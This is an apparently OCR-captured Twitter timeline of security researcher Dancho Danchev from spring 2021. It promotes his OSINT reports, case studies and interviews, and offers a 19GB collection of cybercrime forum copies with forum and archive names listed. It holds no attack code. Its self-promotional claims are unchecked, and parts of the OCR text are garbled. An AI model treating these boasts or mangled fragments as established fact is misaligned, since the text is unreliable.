
https://t.co/JXE067UcqwW https://t.co/9GLQqRXbLC 


06:19 
06:19


“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 


https://t.co/Xolw3nvMaqyY https://t.co/M4wnJAILUj 


Dancho Danchev's 
Offensive Cyber 
Warfare Articles 
Compilation for 

Unit-123.org 


BY DANCHO DANCHEV 


06:20 
https://t.co/k5QSE62Vkc https://t.co/8yF5IOUIOg 


06:22 


Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


https://t.co/FfRbK11tuUD https://t.co/F4ShD2Rxny 
06:23
https://t.co/p6siiRueVF https://t.co/kTRgOv8z0g 
Dancho Danchev Presents! Brace Yourselves!


Grab today a free copy of the Second Free. ’ 
Exposing Iran's Hacking Scene OSINT-Enaétied and 
Technica ania: Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 


Organization including Individual Researcher Use - This is
the Most Comprehensive and Technically Sophisticated
Analysis of Iran's Hacking Scene Up-to-Date!




Commercial Copy Available! Approach me today!
Approach your manager today! Empower your Threat
Intelligence Team! An OSINT Conducted Today is a
Tax Payer's Dollar Saved Tomorrow!
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


12 - Friday 
09:09 

https://t.co/kyl5GvScSi 
22 - Monday 


02:17 


Folks. Check this out! New layout at https://t.co/fnswrm8KWP Cheers! Dancho 
#Security #cybercrime #malware #CyberSecurity #CyberAttack #Threatintel 
#Threatintelligence 
09:23


I’m switching my personal blog to private mode as of today with the idea to attract a 
new form of readership that also includes loyal readers. Request access now. 
https://t.co/7SCvOYKFHE #security #cybercrime #malware #cyberattacks 
#ThreatHunting #Threatintel #Threatintelligence 


<2 
23:17 


Who’s interested in this? - https://t.co/7SCVOYKFHE #security #cybercrime #malware 
#CyberSec #ThreatHunting 


23:24 


Folks! Who wants to obtain private access to my blog? - https://t.co/7SCVOYKFHE 
#security #cybercrime #malware #CyberSec #ThreatHunting 
https://t.co/sM2UAYVaez 


21 *3 


Competitors

Identified Competitors:
* Cyber Defense Agency (CDA) (US)
* Cyber Security Research and Development Center (US)
* Cyveillance (US)
* Dancho Danchev (EU)
* Department of Homeland Security US-CERT (US)
* Ernst & Young (EU)
* EWA Information and Infrastructure Technologies, Inc. (US)
* Fortify (US)
* Global Security Mag (EU)
* iDefense Labs (US)
* JET Intelligent Risk Systems (US)
* Informatica (US)
* IT — Information Sharing and Analysis Center (US)
* iSIGHT Partners (US)
* Lookingglass (US)
* Multi-State Information Sharing Analysis Center (US)
* nCircle (US)
* SecureWorks (US)
* Trend Micro (US)
* United States Cyber Consequence Unit (US)


23 - Tuesday 


20:47 


96 seats left! Request access today! - https://t.co/wEK5XX2J9Z #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting #Threatintel 
#Threatintelligence


21 


22:17 


@jmxjmxpro Send an introduction to dancho.danchev@hush.com and I'll then fill you 
in the process. Regards. Dancho 


*1 


24 - Wednesday 


00:38 


93 seats left! Request access today! - https://t.co/JTcqOaYgET 
https://t.co/AKWHqVtDzD 


26 - Friday 


12:18 


Stay tuned for an upcoming interview with me for Russian OSINT. Check out the 
details here - https://t.co/6yL4PKVOsT https://t.co/CrNRo3tvfE 


21 *%2 
Russian OSINT

Streams of Information Security
Knowledge

We plan to do a text interview with OSINT expert Dancho Danchev for the
Russian OSINT channel on the topic “cybercrime forums 2021 and darknet
activity: exposing cybercriminals”. This is relevant for those who know
English, want to earn money and want to try their hand at the text
interview format.

As a test, you need to write 10 interesting questions for the expert (in
your opinion) in English and send them to the bot @russian_osint_bot in
the following format:


1. Who is Mr. Danchev? 


2. How to expose cybercriminals? 
3. What is OSINT? 




27 - Saturday 


00:02 


93 seats still left! https://t.co/JTcqOaYgET request access today! 
https://t.co/7g6vWgWzjxX 


*1 
09:07


Grab a copy of the first report on Iran’s Hacking Ecosystem here - 
https://t.co/FfRbK11tuUD for free including the second edition of the report from here - 
https://t.co/p6siiRueVF for free! Cheers! Dancho https://t.co/T6b7qJh4QU 




09:07 


Grab a copy of the first report on Iran’s Hacking Ecosystem here - 
https://t.co/FfRbK11tuUD for free including the second edition of the report from here - 
https://t.co/p6siiRueVF for free! Cheers! Dancho https://t.co/IgOEabVqra




09:07 


Grab a copy of the first report on Iran’s Hacking Ecosystem here - 
https://t.co/fRbK11tuUD for free including the second edition of the report from here - 
https://t.co/p6siiRueVF for free! Cheers! Dancho https://t.co/R3vJ4VkC4u 
28 - Sunday


08:49 


Is anyone running a MISP or OpenCTI instance for their team or organization and 
wants me to jump in? Reply or drop me a line dancho.danchev@hush.com #security 
#cybercrime #malware #CyberSecurity #cyberattacks #ThreatHunting 


1 
09:01 
In a previous life I was about to work with HBGary - https://t.co/SRSIBRVJOh quite a
privilege and an honor! Regards. Dancho 


21 %1 


30 - Tuesday 


07:47 


New Post - "Exposing a Currently Active Stolen Credit Cards E-Shop - An OSINT 
Analysis" - https://t.co/wUrRDmhPsS #security #cybercrime #malware 
#CyberSecurity #cyberattacks #Threatintel #threatintelligence 
07:48 


New Post - "Current and Future Assessment of U.S U.K and German Cyber Intelligence 
and Cyber Surveillance Programs and Tradecraft - An Analysis" - 
https://t.co/n8xwn7cuRQ #security #cybercrime #malware #CyberSecurity
#cyberattacks #Threatintel 


07:48 


New Post - "The "Russia Small Group" - A Step in the Right Direction or a Dangerous 
Game to Play With?" - https://t.co/KgT630ek5c #security #cybercrime #malware 
#CyberSecurity #cyberattacks #Threatintel #threatintelligence 


2 
April 
2 - Friday 
06:28 
Q: Who are you? A: I’m the one schooling you son. https://t.co/TCcFUbDAWUf 
#NowPlaying 
06:31 


https://t.co/EoqHZoaY55 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberCrimes #CyberHunter #ThreatIntelligence #ThreatHunting 


06:32 

https://t.co/qBbOI3zR5f #security #cybercrime #malware 
*1 
06:33 

https://t.co/c9XGjM3iaO #security #cybercrime #malware 
06:34 


https://t.co/kKDPYiIEKDQQ #security #cybercrime #malware 


7 - Wednesday 


09:18 
https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberAttack 
#Threatintelligence #ThreatHunting 
09:52 


@vxunderground @threatresearch Check this out! - https://t.co/1lbf58DQ1sD Cheers! 
Dancho 


*1 
9 - Friday


03:35 


Hey @Russian_OSINT just send back the interview questions and I'll be in a stay 
tuned mode to see them published. Regards. Dancho 


22 *%1 
03:41 
Someone's been reading my "Malware - Future Trends" report circa 2006 -
https://t.co/8wfdqxgEcxX hence today’s modern ransomware threat also known as the
rise of cryptoviral extortion. #security #cybercrime #malware #CyberSecurity
#CyberAttack #cyberattack


23 
09:06 


Anyone hiring security bloggers reporters journalists including OSINT analysts and 
threat intelligence analysts? 


17:30 


Guys. Does anyone have an iOS developer account including a Google Developer 
account and wants to assist me in publishing an application for my personal blog? 
Can you send me an invite? Post a comment or send the actual invitation to 
dancho.danchev@hush.com https://t.co/FOHWNnIhiA 
10 - Saturday


07:31 


Any iOS developers or Google developers reading this? Can you please post a 
comment. Regards. Dancho 


*1 
09:22 
My presentations - https://t.co/nNsXMPrGi0 


09:24 


Check this out! This is basically a copy of all of my publicly accessible research - 
https://t.co/UZ6qVANXVF 
09:31


This is an interview with me - https://t.co/glQoxvUWSs #security #cybercrime 
#malware #CyberSecurity #CyberAttack #ThreatHunting #threatintelligence 


09:48 
Who wants to pre-order? - https://t.co/OleO1lpf7rU https://t.co/cjj9NYhzQt 




09:53 


Underground chatter on my disappearance circa 2010. Source: 
https://t.co/tILTP2B5ZT https://t.co/CQm7Uf27ZC 
Dancho Danchev sucked it and he will eventually suck it too.
I’m not doing this as my hobby. 

you think I’m afraid of anything? I have no time to be afraid. 
I’m working. 


09:54 
Underground chatter on my disappearance circa 2010. Source: 
https://t.co/cTtpAbqDQF CC: @XylitOl 
23:37 
This is me in NYTimes on the Koobface botnet - https://t.co/uW1OBMgsXM


12 - Monday 


02:30 


Amazon Kindle users! Check this out - https://t.co/JT676NfPZI #security #cybercrime 
#malware #CyberAttack #Threatintel #threatintelligence 




23:55 
https://t.co/fRobK11tuUD https://t.co/zfoOWB7TFI 
23:56
https://t.co/p6siiRueVF https://t.co/UD5eQ3XMWq 
Dancho Danchev Presents! Brace Yourselves!


Grab today a free copy of the Second Free Eg ' 
"Exposing Iran's Hacking Scene OSINT-E d and 


Technical Collection Empowered and Visualized Report! 
Priced at $500 for an Unlimited Distribution Among Your 
Organization including Individual Researcher Use - This is
the Most Comprehensive and Technically Sophisticated
Analysis of Iran's Hacking Scene Up-to-Date! 




Commercial Copy Available! Approach me today!
Approach your manager today! Empower your Threat 
intelligence Team! An OSINT Conducted Today is a 
Tax Payer's Dollar Saved Tomorrow! 
https://ddanchev.blogspot.com 
Official OSINT Report Price - $500 


Technical Collection Data - Exclusive Email: dancho.danchev@hush.com 
Copy Available! 


13 - Tuesday 


04:53 
https://t.co/F80Ov6zz0k https://t.co/EHg70dn9ZT 
14 - Wednesday


04:36 


Russian OSINT

An interview with OSINT specialist Dancho Danchev. We did not manage to
get detailed answers to every question, but overall the message is clear.
Cybercrime is progressing, ransomware is the main trend of 2021, and the
USA is still at odds with Russia.
Contents of the interview:

=> Who is Dancho?
=> What is he known for?
=> Work for U.S Law Enforcement and the U.S Intelligence Community
=> OSINT operation “Uncle George”
=> Cybercrime Forum Data Set of 16 GB
=> Ransomware and Darkweb
=> REvil's profits
=> "Russia remains the main hotbed of cybercrime”
=> Cybercrime in the CIS

https://telegra.ph/Intervyu-s-hakerom-Dancho-Danchev-04-12

Telegraph

Interview with Bulgarian hacker Dancho Danchev, specially for Russian
OSINT: Cybercrime in 2021

Name: Dancho Danchev Occupation: information security researcher, OSINT
specialist Specialization: Cybercrime, Darknet && OSINT Country: Bulgaria
Site: ddanchev.blogspot.com Twitter: https://twitter.com/dancho_danchev
Russian OSINT: Dancho, tell us a little,


Folks. I wanted to let everyone know that I’ve just released my "Cybercrime Forum
Data Set for 2021" which consists of full offline copies of over 111 publicly accessible
cybercrime-friendly forum communities. https://t.co/it8HZFXHh]


https://t.co/MhaSxxpilk 
19GB


Cybercrime Forum 
Data Set 2021 


16 - Friday 


09:59 


Folks! Check out this report courtesy of me - "How to use @whoisxmlapi API in 
Combination with Maltego for Advanced Bulletproof Malicious Infrastructure 
Investigation" - https://t.co/MuQ3QmOnZA [PDF] #security #cybercrime #malware 
#Threatintel #ThreatHunting 


21 %*1 
17 - Saturday


07:28 


Folks. Check out my second report for @whoisxmlapi "How to use WhoisXML API in 
Combination with Maltego for Advanced Mapping and Reconnaissance of Botnet 
Command and Control Infrastructure Using Hostinger’s Legitimate Infrastructure" - 
https://t.co/CgxOCjkmdz 


*1 


19 - Monday 


10:18 


I’m live! Show your reader support in case you know who I am what I’m up to and the
type of research that I publish. https://t.co/uvAt5h1Kt8 iOS version coming soon!
https://t.co/alF8gw7rBK 
20 - Tuesday
02:48 


[Screenshot: Google Play listing for the app "Blog" by Dancho Danchev. About this app:
"Dancho Danchev is the world’s leading expert in the field of cybercrime fighting".
Ratings and reviews: No reviews yet.]


Folks. Stay tuned for an additional set of new white papers using @whoisxmlapi and 
@MaltegoHQ to be released today or tomorrow. Catch up - E-shop for stolen credit 
cards - https://t.co/ChQTqSNqow botnet C&C using @Hostinger -


21 - Wednesday 


02:40 


https://t.co/eL8FCTB6TW 


Joining Team @whoisxmlapi - https://t.co/SZOM2wMAt) #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#ThreatHunting #Threatintelligence


23 %2 
02:43 


Why I’ve decided to join Team @whoisxmlapi and why you should grab an account 
today? - https://t.co/oDRBOSHOc9 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatIntel #ThreatHunting #Threatintelligence 


=—3 *l 
03:32 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreatintelligence #Threatintel #ThreatHunting 
#Threatintelligence 


23 - Friday 


13:35 


Check this out! https://t.co/KxAShMz7ud CC: @whoisxmlapi @briankrebs #security 
#cybercrime #CyberSecurity #cyberattacks #CybersecurityNews #CyberSec 
#threatintelligence #threatdetection 




13:38 


Folks. Check this out. Second case study for today. https://t.co/bt2QioKYYr CC: 
@whoisxmlapi #Security #cybercrime #malware #CyberSecurity #cyberattacks 
#CybersecurityNews #CyberSec #threatintelligence #threatdetection 


e222 
13:41 


This is the third case study for today. https://t.co/RCa8TBWzMg CC: @whoisxmlapi 
#security #cybercrime #malware #CyberSecurity #cyberattacks 
#CybersecurityNews #CyberSec #threatintelligence #threatdetection 


24 - Saturday 


20:44 


https://t.co/UvVAt5gK9BA #security #cybercrime #malware #cybersecuritytips
#CyberAttack #ThreatHunting https://t.co/Bsuj 7b0sSNW 


21 %1 


20:45 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #ThreatHunting https://t.co/WMLoSOfQ1z 


21 *1 
INTRODUCING BOX.SK’S - “HOW TO
GET IN TOUCH WITH THE KGB — THE 
DEFINITE HACKER’S MANUAL’ ONLINE 
MANUAL 


admin 3 months ago 


10 Years Later — An Exc 


Dancho 
Danchev's 


25 - Sunday 


03:13 


Happy #Emotet Uninstall Day? Since when does law enforcement taking offline
“everyone’s favorite" botnet constitute the right action? I think that the right
approach would be to coordinate the take-down of the C&Cs using their Abuse
department.


*1 
03:19 


Here’s an enriched OSINT list of all the publicly known and accessible #Emotet
C&C servers and IPs - https://t.co/9cfq9oruSc including the following case study -
https://t.co/IZzmqzja94 which I did for @whoisxmlapi using @MaltegoHQ Stay tuned!
03:23


I produced the following #Emotet C&C graphs and distribution maps using my
information. Check out the actual post here - https://t.co/9cfq9oruSc including the
actual case study - https://t.co/IZzmqzjJa94 which I did for @whoisxmlapi by using
@MaltegoHQ https://t.co/dPh62SoRQe


2 


Host distribution by country 


~ United Kingdom 


04:50 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberSecurity 
https://t.co/pjknL7ElsS 


04:51 




https://t.co/uvAt5gK9BA https://t.co/AWjxODfd3T 


04:52 
https://t.co/uvAt5gK9BA https://t.co/uCxdU7L9Tm 


VIDEOS 


Exposing Koobface - The World's Largest 


Botnet 


09:20 
My sincere condolences to everyone who knew @dakami as a person. I never really
met him until 2011 when I had big legal troubles in my homeland Bulgaria and got a
message from him inviting me to crash in his place in the U.S. Thanks!


*1 
09:43 
https://t.co/CTXOoRYV1n 


09:43 
https://t.co/qugnqoixXg) 
27 - Tuesday


00:37 


New Post - "Exposing the Pay Per Install Underground Business Model - Historical 
OSINT - An Analysis - 2008 - Part Two" - https://t.co/IkKD2EovvLO #security 
#cybercrime #malware #CyberSecurity #ThreatHunting 


4 *%2 
01:19 


@nigroeneveld @envirosec This is not serious. Personally the Dutch Law 
Enforcement had been extremely active throughout the past couple of years in terms 
of active measures against cybercrime forum communities and the actual bad guys 
behind them. Cheers for that! 


*1 
01:21 


@nigroeneveld @envirosec Here’s a related post https://t.co/pljQJJc9Pc including this 
https://t.co/voila4FF4W central repositories of information and government including 
private and academic sector work and information sharing should do the work. 


*1 
01:30 


@nigroeneveld @envirosec I’ve been following Dutch LE fighting cybercrime for a
while. I think that trusted and well-known researchers and organizations should be
considered an asset to every LE agency. Most importantly a single LE case is often
solved simply by asking.


*%2 
01:43 


@nigroeneveld @envirosec Good point. I think that sharing as much threat
intelligence as possible including with the right parties where necessary is the best 
possible way to attempt to undermine and disrupt the global cybercrime ecosystem. 


*1 
01:44 


@nigroeneveld @envirosec It’s been years since I’ve last quoted this but I’ve once 
said in case a cybercriminal decides to sue you for tracking down and monitoring
their fraudulent and malicious campaign they will inevitably signal that they own the 
actual infrastructure. 


*1 
02:12 


My first research paper for @whoisxmlapi is now live. It’s a bulletproof hosting 
infrastructure used by the bad guys with a currently active E-Shop for stolen credit 
cards on the top of it. https://t.co/fesvmCAPHG https://t.co/f9c11UHGKd 
*%2


08:04 


Great stuff! My first podcast recording with @whoisxmlapi - https://t.co/c78SWm2HXv 
#security #cybercrime #malware #CyberSecurity 


22 


08:44 
https://t.co/2hfqnBoPEu 


28 - Wednesday 


08:37 
https://t.co/it8HZFXHhJ https://t.co/OgXk3Rlo2h 
FORUM DATA
SET 2021


OVER 111 FULL OFFLINE COPIES


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


09:17 


https://t.co/QHRkZJK804 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #Threatintel https://t.co/e4OLWxkOw4 
[Screenshot: analytics dashboard, Apr 21 - Apr 27. Audience overview: Users 390,
Sessions 493, New Users 358 (changes of 33.11%, 38.87% and 34.59% against the
previous period). Trend of Users: 390, +97. Behavior overview: Avg. Session Duration,
Bounce Rate, Pageviews.]


09:32 


https://t.co/EVf60SkxOH #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #ThreatIntel https://t.co/kXmaSbeXLf 
22:14


22:16 


22:18 


22:20 
[Screenshot: analytics dashboard, Apr 21 - Apr 27. Audience overview: Users 1.53K,
Sessions 1.66K, New Users 1.48K (changes of 8.09%, 7.27% and 8.46% against the
previous period). Trend of Users: 1,534, -135. Behavior overview: Avg. Session
Duration, Bounce Rate, Pageviews.]


https://t.co/UjlI5RqvPgc 


https://t.co/chzJHRMvvM 


https://t.co/brzvDjpOFW 


https://t.co/udATJ6CG8o0 


29 - Thursday 


00:23 


Since when does disinformation and foreign influence campaigns falling into a MITRE 
ATT&CK attack category constitute a threat? - https://t.co/VisfZAmxs] Since now.


2 *2 
00:24 


With more @FireEye reports on disinformation and foreign influence operations 
making their way into major headlines the rush must be tempered with wisdom 
otherwise we risk falling victim into rogue cyber warfare tensions engineering. 


00:33 


Such type of reports should be considered dangerous in the context of possible cyber 
warfare tensions engineering on behalf of the author. Here are some related articles - 
https://t.co/YosufyCV21 ; https://t.co/4IEIUNda6o - https://t.co/KgT630ek5c 


02:43 


https://t.co/qs5iTxLwmkK1 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cybersecuritytips #Threatintel 


03:44 


I have a new BIO on LinkedIn. Keep reading. Rocking your world already? Just kidding.
https://t.co/KO8m5LOZZm 




Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- I had an average of 7,000 RSS readers on my blog

- I have my own vinyl “Blue Sabbath Black Cheer / Griefer -
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista, box.sk 

- I gave an interview to DW on the Koobface Botnet

- I gave an interview to NYTimes on the Koobface botnet

- I gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 


03:49 


This is me winning @SCMagazine Who to Follow on Twitter Award for 2011. 
https://t.co/400ck9m8cD 




February 15, 2011


SC Social Media Awards


Best Security Blogger: Graham Cluley, senior technology consultant at Sophos, for the
Naked Security Blog

Best Corporate Security Blog: Trend Micro’s TrendLabs Malware Blog


Five to Follow on Twitter:

- @cyberwar and @stiennon (Richard Stiennon, chief research analyst of IT-Harvest)

- @George KurtzCTO (George Kurtz, worldwide CTO of McAfee)

- @danchodanchev (Dancho Danchev, independent security consultant)

- @jeremiahg (Jeremiah Grossman, founder and CTO of WhiteHat Security)

- @owasp (the Open Web Application Security Project)


07:07 


My response to #Ransomware - 3,000+ ransomware emails used by gangs and lone 
users taken offline. Beer is on you. https://t.co/U7nD29mcOz 


Dancho Danchev @dancho 11 Nov 20

New Post - "Exposing Protonmail and Tutanota's Illicit Abuse by Ransomware Gangs - A
Compilation of Currently Active Ransomware-Themed Email Addresses” - is.gd/NPLLQ5
CC: @ProtonMail @TutanotaTeam #security #cybercrime #malware #Threatintelligence


ProtonMail @ProtonMail

Replying to @dancho_danchev and @TutanotaTeam
Thanks for the report, we have zero tolerance for abuse and we'll investigate this and
take the appropriate actions.

17:52 - 11 Nov 20 - Twitter Web App


08:45 


New Post - Exposing China’s "Thousand Talents Program" - An OSINT Analysis - 
https://t.co/WvpFvvOzGN 
09:26 
https://t.co/oNheLlagjV #security #cybercrime #malware #CyberSecurity 


#CyberAttack #cybersecuritytips #Threatintelligence #ThreatHunting #Threatintel 
https://t.co/iot9Vrmc6G 
Darkmoney iHonker ShadowMarket
T1Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuitvn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr-7olm_org TheBot 
ArmadaBoard ForumSEO Nulinoss.org Toolbabase se 
BigFozzy Free-hack pay-per-install org TotalBlackhat 
BlackhatWorld ghostmarket net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta pw Vsehobby 
Cardvilla GoFuckBiz Procrd Webmasters.ru 
Chi gofuckbiz.com ProLogic Whitehatyn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase WYAW.Opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket la iFud 


10:38 
My second white paper for @whoisxmlapi is now live! https://t.co/vIXE84kbBd CC: 
@Hostinger #Security #cybercrime #malware #CyberSecurity #CyberAttack 
#cybersecuritytips #cyberattacks #Threatintel #Threatintelligence #ThreatHunting 


10:46 
I’m on the front page - https://t.co/YNcm9lAcsr CC: @whoisxmlapi here’s the actual 
podcast - https://t.co/c78SWm2HXv #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #Threatintel #Threatintelligence 
#ThreatHunting https://t.co/g5cFuoAPnS 
[Screenshot of the whoisxmlapi.com front page: "DNS Sonar Report #11: Dancho Danchev" - Listen now]


10:55 
https://t.co/BCwaiEmKd5 #RansomwareTaskForce Stay tuned!


https://t.co/g9kp2apGZN 




30 - Friday 


06:55 




Guys. Check this out. This is the Hungarian entry for https://t.co/BTusMsPDol on
Wikipedia. I wanted to say big thanks to everyone who offered support both
operational and technical know-how including the usual "keep up the good work" for
making this project happen. https://t.co/D1sZI5Zv64


Astalavista.box.sk


Page type: search engine
Categories: search page
Available language(s): English
Establishment: 1994
Editor-in-Chief: Dancho Danchev
URL: box.sk


The website operated under a Slovak domain name.
The name of the website is based on a movie pun. In
the sci-fi action movie Terminator 2 - The Day of
Judgment, the protagonist's character had a
memorable phrase, “Hasta la vista, baby,” a phrase in
Spanish that is a commonly used farewell formula.
The “astalavista” of this sentence is the merging of
the player. It's worth noting that AltaVista, another
well-known search engine of the era that sounded
similar, was only launched in 1995.


In December 2020, cybercrime researcher and
analyst Dancho Danchev, as the operator of the site,
announced the relaunch of the website under the
domain name box.sk. It is designed to support
hackers and cybersecurity experts.


19:00 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Profiling a Money Mule Recruitment Registrant Emails Portfolio - 
An Analysis" - https://t.co/b3rlcYFMTi #security #cybercrime #malware 


19:01 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Profiling a Rogue Fast-Flux Botnet Infrastructure That’s Currently 
Hosting Multiple Online Cybercrime Enterprises - An Analysis" - 
https://t.co/uyr5aXdPRL 

19:02 
New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Profiling the “Jabber ZeuS” Rogue Botnet Enterprise - An
Analysis" - https://t.co/O6IRUSVOWB #security #cybercrime #malware 


19:03 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Exposing a Fraudulent Boutique and Rogue Cybercrime-Friendly 
Forum Community - An Analysis" - https://t.co/Jux2s05X67 #security #cybercrime 
#malware 


19:04 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Exposing a Rogue Domain Portfolio of Fake News Sites - An 
Analysis" - https://t.co/mi2qMdZB3N #security #cybercrime #malware 




May 


2 - Sunday 


21:25 


New Post - "Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle 

George" - An Update - Collected ICQ, Cryptocurrency, XMPP/Jabber, Phone, QQ, 

Telegram and Viber Accounts" https://t.co/Pwf98ffLhO #security #cybercrime 
#malware 




3 - Monday 


20:12 


Who wants to obtain access to my Cybercrime Forum Data Set for 2021? Drop me a
line at dancho.danchev@hush.com #security #cybercrime #malware 
https://t.co/K1InJzFtvUs 


CYBERCRIME
FORUM DATA 
SET 2021 


OVER 11] FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


5 - Wednesday 


05:46 


Folks. Special Easter Discount for my Cybercrime Forum Data Set for 2021 priced at 
$200 for the entire Data Set. Grab a copy today! https://t.co/gsp1kiWxle #security 
#cybercrime #malware #CyberSecurity #CyberAttack #ThreatHunting 
#Threatintelligence 




07:26 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/msRCzcmxlO 


07:27 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/moOvBp4onr 


4HatDay.rar
11Wang.rar
aHack.rar
Aljyyosh.rar
alligator.cash.rar
Antichat.ru.rar
ArmadaBoard.rar
BigFozzy.rar
BlackhatWorld.rar
blacktip.top.rar


07:27 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/VO3uBrOUXQ 


ica.su.rar
iFud.rar
iHonker.rar
imhatimi.org.rar
iransec.net.rar
it-24h.com.rar
itsobr.com.rar
LinkFeed.rar
Linuxac.org.rar
Master-X.rar
MaulTalk.rar


07:28 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/Cm7ycDyDtk 


verified.bz
Webmasters.ru.rar
Whitehat.vn.rar
WWH-Club.rar
www.forohack.com.rar
WWW.Opensc.ws.rar
www.ryan1918.com.rar
Xakep.bg.rar
xaker.name.rar
xaknet.org.rar
Zismo.rar


08:29


https://t.co/H7ZRZUN59S #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintel #Threatintelligence 


6 - Thursday 


03:30 


https://t.co/PvaJoRukgA #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #Threatintel 


17:32 
https://t.co/ZSKjqcPcIM #NowPlaying 
17:42 


Folks. Check this out - https://t.co/oxA5HU7Qp3 here’s my original analysis - 
https://t.co/O3tnrwQbK7 #SolarWinds https://t.co/t{SMRAnmGZv 


We have no intentions to shame the organizations that have installed a
backdoored SolarWinds Orion update, regardless if they were targeted 
by the threat actor or not. In fact, the supply chain security problem is an 
extremely difficult one to tackle, even for companies and organizations 
with very high security standards. This could have happened to anyone! 


However, since multiple passive DNS logs and SUNBURST victim lists 
have been circulating through publicly available channels for over a 
month, we felt that it was now acceptable to publicly write about the 
analysis we've been doing based on all this data. We'd also like to thank 
everyone who has helped collect and share passive DNS data, including 
John Bambenek, Joe Stowik, Rohit Bansal, Dancho Danchev , Paul Vixie 
and VriesHd. This open data has been crucial in order to develop and 
verify our SunburstDomainDecoder tool, which has been leveraged by 
numerous incident response teams to perform forensic analysis of DNS 
